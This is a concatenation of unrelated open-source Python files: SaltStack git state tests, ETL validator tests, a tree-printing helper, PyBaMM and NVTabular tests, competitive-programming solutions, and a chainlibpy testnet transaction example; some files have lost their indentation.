git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
)
def _push(self, repo_path, remote='origin', ref='master'):
self.run_function('git.push', [repo_path], remote=remote, ref=ref)
def _test_latest_force_reset_setup(self):
# Perform the initial clone
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltTrueReturn(ret)
# Make and push changes to remote repo
self._commit(self.admin,
content='Hello world!\n',
message='added a line')
self._push(self.admin)
# Make local changes to clone, but don't commit them
with salt.utils.files.fopen(os.path.join(self.target, 'foo'), 'a') as fp_:
fp_.write('Local changes!\n')
def test_latest_force_reset_remote_changes(self):
'''
        This tests that an otherwise fast-forward change with local changes
will not reset local changes when force_reset='remote_changes'
'''
self._test_latest_force_reset_setup()
# This should fail because of the local changes
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltFalseReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('there are uncommitted changes', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True (or \'remote-changes\')',
ret['comment']
)
self.assertEqual(ret['changes'], {})
# Now run again with force_reset='remote_changes', the state should
# succeed and discard the local changes
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset='remote-changes')
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Uncommitted changes were discarded', ret['comment'])
self.assertIn('Repository was fast-forwarded', ret['comment'])
self.assertNotIn('forced update', ret['changes'])
self.assertIn('revision', ret['changes'])
# Add new local changes, but don't commit them
with salt.utils.files.fopen(os.path.join(self.target, 'foo'), 'a') as fp_:
fp_.write('More local changes!\n')
# Now run again with force_reset='remote_changes', the state should
# succeed with an up-to-date message and mention that there are local
# changes, telling the user how to discard them.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset='remote-changes')
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('up-to-date, but with uncommitted changes', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True to purge uncommitted changes',
ret['comment']
)
self.assertEqual(ret['changes'], {})
def test_latest_force_reset_true_fast_forward(self):
'''
        This tests that an otherwise fast-forward change with local changes
does reset local changes when force_reset=True
'''
self._test_latest_force_reset_setup()
# Test that local changes are discarded and that we fast-forward
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Uncommitted changes were discarded', ret['comment'])
self.assertIn('Repository was fast-forwarded', ret['comment'])
# Add new local changes
with salt.utils.files.fopen(os.path.join(self.target, 'foo'), 'a') as fp_:
fp_.write('More local changes!\n')
# Running without setting force_reset should mention uncommitted changes
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('up-to-date, but with uncommitted changes', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True to purge uncommitted changes',
ret['comment']
)
self.assertEqual(ret['changes'], {})
# Test that local changes are discarded
ret = self.run_state(
'git.latest',
            name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
assert 'Uncommitted changes were discarded' in ret['comment']
assert 'Repository was hard-reset' in ret['comment']
assert 'forced update' in ret['changes']
def test_latest_force_reset_true_non_fast_forward(self):
'''
This tests that a non fast-forward change with divergent commits fails
unless force_reset=True.
'''
self._test_latest_force_reset_setup()
# Reset to remote HEAD
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Uncommitted changes were discarded', ret['comment'])
self.assertIn('Repository was fast-forwarded', ret['comment'])
# Make and push changes to remote repo
self._commit(self.admin,
content='New line\n',
message='added another line')
self._push(self.admin)
# Make different changes to local file and commit locally
self._commit(self.target,
content='Different new line\n',
message='added a different line')
# This should fail since the local clone has diverged and cannot
# fast-forward to the remote rev
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltFalseReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('this is not a fast-forward merge', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True to force this update',
ret['comment']
)
self.assertEqual(ret['changes'], {})
# Repeat the state with force_reset=True and confirm that the hard
# reset was performed
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Repository was hard-reset', ret['comment'])
self.assertIn('forced update', ret['changes'])
self.assertIn('revision', ret['changes'])
def test_renamed_default_branch(self):
'''
Test the case where the remote branch has been removed
https://github.com/saltstack/salt/issues/36242
'''
# Rename remote 'master' branch to 'develop'
os.rename(
os.path.join(self.repo, 'refs', 'heads', 'master'),
os.path.join(self.repo, 'refs', 'heads', 'develop')
)
# Run git.latest state. This should successfully clone and fail with a
# specific error in the comment field.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
rev='develop',
)
self.assertSaltFalseReturn(ret)
self.assertEqual(
ret[next(iter(ret))]['comment'],
'Remote HEAD refers to a ref that does not exist. '
'This can happen when the default branch on the '
'remote repository is renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).\n\n'
'Changes already made: {0} cloned to {1}'
.format(self.repo, self.target)
)
self.assertEqual(
ret[next(iter(ret))]['changes'],
{'new': '{0} => {1}'.format(self.repo, self.target)}
)
# Run git.latest state again. This should fail again, with a different
# error in the comment field, and should not change anything.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
rev='develop',
)
self.assertSaltFalseReturn(ret)
self.assertEqual(
ret[next(iter(ret))]['comment'],
'Cannot set/unset upstream tracking branch, local '
'HEAD refers to nonexistent branch. This may have '
'been caused by cloning a remote repository for which '
'the default branch was renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).'
)
self.assertEqual(ret[next(iter(ret))]['changes'], {})
# Run git.latest state again with a branch manually set. This should
# checkout a new branch and the state should pass.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
rev='develop',
branch='develop',
)
# State should succeed
self.assertSaltTrueReturn(ret)
self.assertSaltCommentRegexpMatches(
ret,
'New branch \'develop\' was checked out, with origin/develop '
r'\([0-9a-f]{7}\) as a starting point'
)
# Only the revision should be in the changes dict.
self.assertEqual(
list(ret[next(iter(ret))]['changes'].keys()),
['revision']
)
# Since the remote repo was incorrectly set up, the local head should
# not exist (therefore the old revision should be None).
self.assertEqual(
ret[next(iter(ret))]['changes']['revision']['old'],
None
)
# Make sure the new revision is a SHA (40 chars, all hex)
self.assertTrue(
len(ret[next(iter(ret))]['changes']['revision']['new']) == 40)
self.assertTrue(
all([x in string.hexdigits for x in
ret[next(iter(ret))]['changes']['revision']['new']])
)
|
from sqlalchemy.sql import sqltypes
from georef_ar_etl.utils import ValidateTableSizeStep
from georef_ar_etl.exceptions import ProcessException
from . import ETLTestCase
class TestValidateTableSizeStep(ETLTestCase):
def test_eq(self):
"""El validador debería retornar la tabla de entrada si su tamaño es el
correcto."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
self._ctx.session.add(t1(id=1))
step = ValidateTableSizeStep(target_size=1)
result = step.run(t1, self._ctx)
self.assertTrue(result is t1)
def test_eq_error(self):
"""El validador debería lanzar una excepción si el tamaño no es el
esperado, cuando se utiliza el operator 'eq'."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
self._ctx.session.add(t1(id=1))
step = ValidateTableSizeStep(target_size=2)
with self.assertRaises(ProcessException):
step.run(t1, self._ctx)
def test_size_greater_equal_than(self):
"""El validador debería retornar la tabla de entrada si su tamaño es
mayor o igual al tamaño objetivo, cuando se utiliza el operador
'ge'."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
for i in range(10):
self._ctx.session.add(t1(id=i))
step = ValidateTableSizeStep(target_size=5, op='ge')
result = step.run(t1, self._ctx)
self.assertTrue(result is t1)
def test_size_greater_equal_than_error(self):
"""El validador debería lanzar una excepción si su tamaño es menor al
tamaño objetivo, cuando se utiliza el operador 'ge'."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
for i in range(10):
self._ctx.session.add(t1(id=i))
step = ValidateTableSizeStep(target_size=11, op='ge')
with self.assertRaises(ProcessException):
step.run(t1, self._ctx)
|
# -*- coding: utf-8 -*-
# @Time : 2022/02/10 16:39:46
# @Author : ddvv
# @Site : https://ddvvmmzz.github.io
# @File : json2tree.py
# @Software : Visual Studio Code
# @WeChat : NextB
from io import StringIO
_branch_extend = '│ '
_branch_mid = '├─ '
_branch_last = '└─ '
_spacing = ' '
lang_map = {
'process': '启动',
'behavior': '操作',
'drop': '释放',
'net': '连接'
}
def _getHierarchy(graph, name='', file=None, _prefix='', _last=True):
""" Recursively parse json data to print data types """
if isinstance(graph, dict):
op_type = graph.get('type', '')
if op_type:
name = lang_map.get(op_type, op_type) + ' ' + graph.get('name')
print(_prefix, _branch_last if _last else _branch_mid, \
name, sep="", file=file)
_prefix += _spacing if _last else _branch_extend
length = len(graph)
for i, key in enumerate(graph.keys()):
_last = i == (length - 1)
_getHierarchy(graph[key], '"' + key + '"', file, _prefix, _last)
elif isinstance(graph, list):
for each_json in graph:
_getHierarchy(each_json, '', file, _prefix, _last=True)
else:
pass
def graph2tree(graph):
messageFile = StringIO()
_getHierarchy(graph, file=messageFile)
message = messageFile.getvalue()
messageFile.close()
return message
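# Hedged usage sketch (illustrative): render a tiny, made-up behavior graph.
if __name__ == '__main__':
    sample_graph = {
        'type': 'process',
        'name': 'example.exe',
        'children': [
            {'type': 'drop', 'name': 'payload.bin'},
            {'type': 'net', 'name': '198.51.100.1:443'},
        ],
    }
    print(graph2tree(sample_graph))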
|
#
# Tests for LG M50 parameter set loads
#
import pybamm
import unittest
class TestChen(unittest.TestCase):
def test_load_params(self):
anode = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/anodes/graphite_Chen2020/parameters.csv"
)
)
self.assertEqual(anode["Negative electrode porosity"], "0.25")
cathode = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/cathodes/nmc_Chen2020/parameters.csv"
)
)
self.assertEqual(cathode["Positive electrode porosity"], "0.335")
electrolyte = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/electrolytes/lipf6_Nyman2008/"
+ "parameters.csv"
)
)
self.assertEqual(electrolyte["Cation transference number"], "0.2594")
cell = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/cells/LGM50_Chen2020/parameters.csv"
)
)
self.assertAlmostEqual(cell["Negative current collector thickness [m]"], 12e-6)
def test_standard_lithium_parameters(self):
chemistry = pybamm.parameter_sets.Chen2020
parameter_values = pybamm.ParameterValues(chemistry=chemistry)
model = pybamm.lithium_ion.DFN()
sim = pybamm.Simulation(model, parameter_values=parameter_values)
sim.set_parameters()
sim.build()
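# A hedged follow-on (not part of the original test): after sim.build(), a
# typical next step would be sim.solve([0, 3600]) to simulate one hour with the
# Chen2020 parameter set.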
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
# By manish.17, contest: ITMO Academy. Дерево отрезков часть 1. 1, problem: (A) Segment Tree for the Sum
# https://codeforces.com/profile/manish.17
from math import inf, log2
class SegmentTree:
def __init__(self, array, func=max):
self.n = len(array)
self.size = 2**(int(log2(self.n-1))+1) if self.n != 1 else 1
self.func = func
self.default = 0 if self.func != min else inf
self.data = [self.default] * (2 * self.size)
self.process(array)
def process(self, array):
self.data[self.size : self.size+self.n] = array
        for i in range(self.size-1, 0, -1):  # index 0 is never read, so stop at 1
self.data[i] = self.func(self.data[2*i], self.data[2*i+1])
def query(self, alpha, omega):
"""Returns the result of function over the range (inclusive)!"""
if alpha == omega:
return self.data[alpha + self.size]
res = self.default
alpha += self.size
omega += self.size + 1
while alpha < omega:
if alpha & 1:
res = self.func(res, self.data[alpha])
alpha += 1
if omega & 1:
omega -= 1
res = self.func(res, self.data[omega])
alpha >>= 1
omega >>= 1
return res
def update(self, index, value):
"""Updates the element at index to given value!"""
index += self.size
self.data[index] = value
index >>= 1
while index:
self.data[index] = self.func(self.data[2*index], self.data[2*index+1])
index >>= 1
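# A small worked example of the structure above, left as comments so the
# submission's stdin/stdout protocol is untouched:
#   st = SegmentTree([1, 2, 3, 4], func=lambda a, b: a + b)
#   st.query(1, 3)   # -> 9  (sum over indices 1..3, inclusive)
#   st.update(2, 10)
#   st.query(0, 3)   # -> 17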
# ------------------- fast io --------------------
import os
import sys
from io import BytesIO, IOBase
BUFSIZE = 8192
class FastIO(IOBase):
newlines = 0
def __init__(self, file):
self._fd = file.fileno()
self.buffer = BytesIO()
self.writable = "x" in file.mode or "r" not in file.mode
self.write = self.buffer.write if self.writable else None
def read(self):
while True:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
if not b:
break
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines = 0
return self.buffer.read()
def readline(self):
while self.newlines == 0:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
self.newlines = b.count(b"\n") + (not b)
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines -= 1
return self.buffer.readline()
def flush(self):
if self.writable:
os.write(self._fd, self.buffer.getvalue())
self.buffer.truncate(0), self.buffer.seek(0)
class IOWrapper(IOBase):
def __init__(self, file):
self.buffer = FastIO(file)
self.flush = self.buffer.flush
self.writable = self.buffer.writable
self.write = lambda s: self.buffer.write(s.encode("ascii"))
self.read = lambda: self.buffer.read().decode("ascii")
self.readline = lambda: self.buffer.readline().decode("ascii")
sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)
input = lambda: sys.stdin.readline().rstrip("\r\n")
# ------------------- fast io --------------------
n, m = map(int, input().split())
a = list(map(int, input().split()))
st = SegmentTree(a, func=lambda a, b: a+b)
for i in range(m):
x, y, z = map(int, input().split())
if x == 1:
st.update(y,z)
else:
print(st.query(y,z-1))
|
# https://www.codewars.com/kata/517abf86da9663f1d2000003/train/python
# Complete the method/function so that it converts dash/underscore delimited
# words into camel casing. The first word within the output should be capitalized
# only if the original word was capitalized (known as Upper Camel Case, also
# often referred to as Pascal case).
# Examples
# to_camel_case("the-stealth-warrior") # returns "theStealthWarrior"
# to_camel_case("The_Stealth_Warrior") # returns "TheStealthWarrior"
def to_camel_case(text):
result = ""
temp = ''
tempList = []
for i in range(len(text)):
char = text[i]
if (char == '-' or char == '_'):
tempList.append(temp)
temp = ''
else:
temp += char
tempList.append(temp)
result += tempList[0]
for word in tempList[1:]:
result += word[0].upper() + word[1:]
return result
# Alternative:
# def to_camel_case(s):
# return s[0] + s.title().translate(None, "-_")[1:] if s else s
# Explanations:
# The title() method returns a copy of the string in which the first character of each word is capitalized.
# The two-argument translate(None, "-_") call is the Python 2 str API: it maps characters through a
# translation table (None here, i.e. no remapping) and deletes every character found in the second argument.
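# A hedged Python 3 adaptation of the same idea (a sketch, not the kata author's code):
def to_camel_case_py3(s):
    # str.maketrans('', '', '-_') builds a table that deletes '-' and '_'.
    return s[0] + s.title().translate(str.maketrans('', '', '-_'))[1:] if s else s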
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from chainlibpy import CROCoin, GrpcClient, Transaction, Wallet
from chainlibpy.generated.cosmos.bank.v1beta1.tx_pb2 import MsgSend
from chainlibpy.grpc_client import NetworkConfig
# Recommend to use [pystarport](https://pypi.org/project/pystarport/) to setup a testnet locally
# To use testnet configs in local_testnet_configs with pystarport:
# 1. Download corresponding chain-maind binary from https://github.com/crypto-org-chain/chain-main/releases # noqa: 501
# 2. Copy chain-maind binary to `./example` directory
# 3. Enter `poetry shell`
# 4. Go to `./example` directory
# 5. Run Command `pystarport serve --data=./data --config=./local_testnet_configs/default.yaml --cmd=./chain-maind` # noqa: 501
# 6. Obtain `MNEMONIC_PHRASE` and `TO_ADDRESS` accordingly
# 7. Open another terminal window and run examples in this file
# Obtained from {directory_started_pystarport}/data/chainmaind/accounts.json
# To recover one of the genesis account
MNEMONIC_PHRASE = "first ... last"
# Obtained from {directory_started_pystarport}/data/chainmaind/accounts.json
TO_ADDRESS = "cro...add"
LOCAL_NETWORK = NetworkConfig(
# grpc_endpoint from {directory_started_pystarport}/data/chaintest/nodex/config/app.toml
# Look for "gRPC Configuration" section
grpc_endpoint="0.0.0.0:26653",
    # chain_id from {directory_started_pystarport}/data/
# the directory name under data is the chain_id
chain_id="chaintest",
address_prefix="cro",
coin_denom="cro",
coin_base_denom="basecro",
exponent=8,
derivation_path="m/44'/394'/0'/0/0",
)
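# Note (an inference from the config above, not from the chainlibpy docs): with
# exponent=8, one "cro" corresponds to 10**8 "basecro", so CROCoin("10", "cro",
# LOCAL_NETWORK) below should represent 1_000_000_000 basecro.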
def simple_transaction():
client = GrpcClient(LOCAL_NETWORK)
sending_wallet = Wallet(
MNEMONIC_PHRASE, LOCAL_NETWORK.derivation_path, LOCAL_NETWORK.address_prefix
)
sending_account = client.query_account(sending_wallet.address)
sending_account_init_bal = client.query_account_balance(sending_wallet.address)
receiving_account_init_bal = client.query_account_balance(TO_ADDRESS)
print(
f"sending account initial balance: {sending_account_init_bal.balance.amount}"
f"{sending_account_init_bal.balance.denom}"
)
print(
f"receiving account initial balance: {receiving_account_init_bal.balance.amount}"
f"{receiving_account_init_bal.balance.denom}"
)
ten_cro = CROCoin("10", "cro", LOCAL_NETWORK)
one_cro_fee = CROCoin("1", "cro", LOCAL_NETWORK)
msg_send = MsgSend(
from_address=sending_wallet.address,
to_address=TO_ADDRESS,
amount=[ten_cro.protobuf_coin_message],
)
tx = Transaction(
chain_id=LOCAL_NETWORK.chain_id,
from_wallets=[sending_wallet],
msgs=[msg_send],
account_number=sending_account.account_number,
fee=[one_cro_fee.protobuf_coin_message],
client=client,
)
signature_alice = sending_wallet.sign(tx.sign_doc.SerializeToString())
signed_tx = tx.set_signatures(signature_alice).signed_tx
client.broadcast_transaction(signed_tx.SerializeToString())
sending_account_aft_bal = client.query_account_balance(sending_wallet.address)
receiving_account_aft_bal = client.query_account_balance(TO_ADDRESS)
print("After transaction of sending 10cro with a 1cro fee:")
print(
f"sending account after balance: {sending_account_aft_bal.balance.amount}"
f"{sending_account_aft_bal.balance.denom}"
)
print(
f"receiving account after balance: {receiving_account_aft_bal.balance.amount}"
f"{receiving_account_aft_bal.balance.denom}"
)
def transaction_with_two_messages():
client = GrpcClient(LOCAL_NETWORK)
sending_wallet = Wallet(
MNEMONIC_PHRASE, LOCAL_NETWORK.derivation_path, LOCAL_NETWORK.address_prefix
)
sending_account = client.query_account(sending_wallet.address)
sending_account_init_bal = client.query_account_balance(sending_wallet.address)
receiving_account_init_bal = client.query_account_balance(TO_ADDRESS)
print(
f"sending account initial balance : {sending_account_init_bal.balance.amount}"
f"{sending_account_init_bal.balance.denom}"
)
print(
f"receiving account initial balance: {receiving_account_init_bal.balance.amount}"
f"{receiving_account_init_bal.balance.denom}"
)
one_hundred_cro = CROCoin("100", "cro", LOCAL_NETWORK)
two_hundred_cro = CROCoin("200", "cro", LOCAL_NETWORK)
one_cro_fee = CROCoin("1", "cro", LOCAL_NETWORK)
msg_send_100_cro = MsgSend(
from_address=sending_wallet.address,
to_address=TO_ADDRESS,
amount=[one_hundred_cro.protobuf_coin_message],
)
msg_send_200_cro = MsgSend(
from_address=sending_wallet.address,
to_address=TO_ADDRESS,
amount=[two_hundred_cro.protobuf_coin_message],
)
tx = Transaction(
chain_id=LOCAL_NETWORK.chain_id,
from_wallets=[sending_wallet],
msgs=[msg_send_100_cro],
account_number=sending_account.account_number,
fee=[one_cro_fee.protobuf_coin_message],
client=client,
)
tx.append_message(msg_send_200_cro)
signature_alice = sending_wallet.sign(tx.sign_doc.SerializeToString())
signed_tx = tx.set_signatures(signature_alice).signed_tx
client.broadcast_transaction(signed_tx.SerializeToString())
sending_account_aft_bal = client.query_account_balance(sending_wallet.address)
receiving_account_aft_bal = client.query_account_balance(TO_ADDRESS)
sending_account_cro = CROCoin(
sending_account_aft_bal.balance.amount,
sending_account_aft_bal.balance.denom,
LOCAL_NETWORK,
)
receiving_account_cro = CROCoin(
receiving_account_aft_bal.balance.amount,
receiving_account_aft_bal.balance.denom,
LOCAL_NETWORK,
)
print("After transaction of sending 300cro in total with a 1cro fee:")
print(f"sending account after balance : {sending_account_cro.amount_with_unit}")
print(f"receiving account after balance: {receiving_account_cro.amount_with_unit}")
if __name__ == "__main__":
simple_transaction()
transaction_with_two_messages()
|
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import time
import cudf
import numba.cuda
import pytest
from cudf.tests.utils import assert_eq
import nvtabular as nvt
from nvtabular import ops as ops
from nvtabular.framework_utils.torch.models import Model
from nvtabular.framework_utils.torch.utils import process_epoch
from tests.conftest import mycols_csv, mycols_pq
# If pytorch isn't installed skip these tests. Note that the
# torch_dataloader import needs to happen after this line
torch = pytest.importorskip("torch")
import nvtabular.loader.torch as torch_dataloader # noqa isort:skip
GPU_DEVICE_IDS = [d.id for d in numba.cuda.gpus]
@pytest.mark.parametrize("batch", [0, 100, 1000])
@pytest.mark.parametrize("engine", ["csv", "csv-no-header"])
def test_gpu_file_iterator_ds(df, dataset, batch, engine):
df_itr = cudf.DataFrame()
for data_gd in dataset.to_iter(columns=mycols_csv):
df_itr = cudf.concat([df_itr, data_gd], axis=0) if df_itr else data_gd
assert_eq(df_itr.reset_index(drop=True), df.reset_index(drop=True))
@pytest.mark.parametrize("engine", ["parquet"])
@pytest.mark.parametrize("cat_names", [["name-cat", "name-string"], []])
@pytest.mark.parametrize("cont_names", [["x", "y", "id"], []])
@pytest.mark.parametrize("label_name", [["label"], []])
def test_empty_cols(tmpdir, df, dataset, engine, cat_names, cont_names, label_name):
features = []
if cont_names:
features.append(cont_names >> ops.FillMedian() >> ops.Normalize())
if cat_names:
features.append(cat_names >> ops.Categorify())
# test out https://github.com/NVIDIA/NVTabular/issues/149 making sure we can iterate over
# empty cats/conts
graph = sum(features, nvt.ColumnGroup(label_name))
if not graph.columns:
# if we don't have conts/cats/labels we're done
return
processor = nvt.Workflow(sum(features, nvt.ColumnGroup(label_name)))
output_train = os.path.join(tmpdir, "train/")
os.mkdir(output_train)
df_out = processor.fit_transform(dataset).to_ddf().compute(scheduler="synchronous")
data_itr = torch_dataloader.TorchAsyncItr(
nvt.Dataset(df_out), cats=cat_names, conts=cont_names, labels=label_name, batch_size=1
)
for nvt_batch in data_itr:
cats, conts, labels = nvt_batch
if cat_names:
assert cats.shape[-1] == len(cat_names)
if cont_names:
assert conts.shape[-1] == len(cont_names)
if label_name:
assert labels.shape[-1] == len(label_name)
@pytest.mark.parametrize("part_mem_fraction", [0.001, 0.06])
@pytest.mark.parametrize("batch_size", [1, 10, 100])
@pytest.mark.parametrize("engine", ["parquet"])
@pytest.mark.parametrize("devices", [None, GPU_DEVICE_IDS[:2]])
def test_gpu_dl(tmpdir, df, dataset, batch_size, part_mem_fraction, engine, devices):
cat_names = ["name-cat", "name-string"]
cont_names = ["x", "y", "id"]
label_name = ["label"]
conts = cont_names >> ops.FillMedian() >> ops.Normalize()
cats = cat_names >> ops.Categorify()
processor = nvt.Workflow(conts + cats + label_name)
output_train = os.path.join(tmpdir, "train/")
os.mkdir(output_train)
processor.fit_transform(dataset).to_parquet(
shuffle=nvt.io.Shuffle.PER_PARTITION,
output_path=output_train,
out_files_per_proc=2,
)
tar_paths = [
os.path.join(output_train, x) for x in os.listdir(output_train) if x.endswith("parquet")
]
nvt_data = nvt.Dataset(tar_paths[0], engine="parquet", part_mem_fraction=part_mem_fraction)
data_itr = torch_dataloader.TorchAsyncItr(
nvt_data,
batch_size=batch_size,
cats=cat_names,
conts=cont_names,
labels=["label"],
devices=devices,
)
columns = mycols_pq
df_test = cudf.read_parquet(tar_paths[0])[columns]
df_test.columns = [x for x in range(0, len(columns))]
num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(tar_paths[0])
rows = 0
# works with iterator alone, needs to test inside torch dataloader
for idx, chunk in enumerate(data_itr):
if devices is None:
assert float(df_test.iloc[rows][0]) == float(chunk[0][0][0])
rows += len(chunk[0])
del chunk
# accounts for incomplete batches at the end of chunks
    # that don't necessarily have the full batch_size
assert rows == num_rows
def gen_col(batch):
batch = batch[0]
return batch[0], batch[1], batch[2]
t_dl = torch_dataloader.DLDataLoader(
data_itr, collate_fn=gen_col, pin_memory=False, num_workers=0
)
rows = 0
for idx, chunk in enumerate(t_dl):
if devices is None:
assert float(df_test.iloc[rows][0]) == float(chunk[0][0][0])
rows += len(chunk[0])
if os.path.exists(output_train):
shutil.rmtree(output_train)
@pytest.mark.parametrize("part_mem_fraction", [0.001, 0.1])
@pytest.mark.parametrize("engine", ["parquet"])
def test_kill_dl(tmpdir, df, dataset, part_mem_fraction, engine):
cat_names = ["name-cat", "name-string"]
cont_names = ["x", "y", "id"]
label_name = ["label"]
conts = cont_names >> ops.FillMedian() >> ops.Normalize()
cats = cat_names >> ops.Categorify()
processor = nvt.Workflow(conts + cats + label_name)
output_train = os.path.join(tmpdir, "train/")
os.mkdir(output_train)
processor.fit_transform(dataset).to_parquet(
shuffle=nvt.io.Shuffle.PER_PARTITION,
output_path=output_train,
out_files_per_proc=2,
)
tar_paths = [
os.path.join(output_train, x) for x in os.listdir(output_train) if x.endswith("parquet")
]
nvt_data = nvt.Dataset(tar_paths[0], engine="parquet", part_mem_fraction=part_mem_fraction)
data_itr = torch_dataloader.TorchAsyncItr(
nvt_data, cats=cat_names, conts=cont_names, labels=["label"]
)
results = {}
for batch_size in [2 ** i for i in range(9, 25, 1)]:
print("Checking batch size: ", batch_size)
        num_iter = max(10 * 1000 * 1000 // batch_size, 100)  # load 1e7 samples
# import pdb; pdb.set_trace()
data_itr.batch_size = batch_size
start = time.time()
for i, data in enumerate(data_itr):
if i >= num_iter:
break
del data
stop = time.time()
throughput = i * batch_size / (stop - start)
results[batch_size] = throughput
print(
"batch size: ",
batch_size,
", throughput: ",
throughput,
"items",
i * batch_size,
"time",
stop - start,
)
def test_mh_support(tmpdir):
df = cudf.DataFrame(
{
"Authors": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Reviewers": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Engaging User": ["User_B", "User_B", "User_A", "User_D"],
"Post": [1, 2, 3, 4],
}
)
cat_names = ["Authors", "Reviewers"] # , "Engaging User"]
cont_names = []
label_name = ["Post"]
cats = cat_names >> ops.HashBucket(num_buckets=10)
processor = nvt.Workflow(cats + label_name)
df_out = processor.fit_transform(nvt.Dataset(df)).to_ddf().compute(scheduler="synchronous")
# check to make sure that the same strings are hashed the same
authors = df_out["Authors"].to_arrow().to_pylist()
assert authors[0][0] == authors[1][0] # 'User_A'
assert authors[2][1] == authors[3][0] # 'User_C'
data_itr = torch_dataloader.TorchAsyncItr(
nvt.Dataset(df_out), cats=cat_names, conts=cont_names, labels=label_name
)
idx = 0
for batch in data_itr:
idx = idx + 1
cats, conts, labels = batch
cats, mh = cats
# mh is a tuple of dictionaries {Column name: (values, offsets)}
assert len(mh) == len(cat_names)
assert not cats
assert idx > 0
def test_mh_model_support(tmpdir):
df = cudf.DataFrame(
{
"Authors": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Reviewers": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Engaging User": ["User_B", "User_B", "User_A", "User_D"],
"Null User": ["User_B", "User_B", "User_A", "User_D"],
"Post": [1, 2, 3, 4],
"Cont1": [0.3, 0.4, 0.5, 0.6],
"Cont2": [0.3, 0.4, 0.5, 0.6],
"Cat1": ["A", "B", "A", "C"],
}
)
cat_names = ["Cat1", "Null User", "Authors", "Reviewers"] # , "Engaging User"]
cont_names = ["Cont1", "Cont2"]
label_name = ["Post"]
out_path = os.path.join(tmpdir, "train/")
os.mkdir(out_path)
cats = cat_names >> ops.Categorify()
conts = cont_names >> ops.Normalize()
processor = nvt.Workflow(cats + conts + label_name)
df_out = processor.fit_transform(nvt.Dataset(df)).to_ddf().compute()
data_itr = torch_dataloader.TorchAsyncItr(
nvt.Dataset(df_out),
cats=cat_names,
conts=cont_names,
labels=label_name,
batch_size=2,
)
emb_sizes = nvt.ops.get_embedding_sizes(processor)
EMBEDDING_DROPOUT_RATE = 0.04
DROPOUT_RATES = [0.001, 0.01]
HIDDEN_DIMS = [1000, 500]
LEARNING_RATE = 0.001
model = Model(
embedding_table_shapes=emb_sizes,
num_continuous=len(cont_names),
emb_dropout=EMBEDDING_DROPOUT_RATE,
layer_hidden_dims=HIDDEN_DIMS,
layer_dropout_rates=DROPOUT_RATES,
).cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
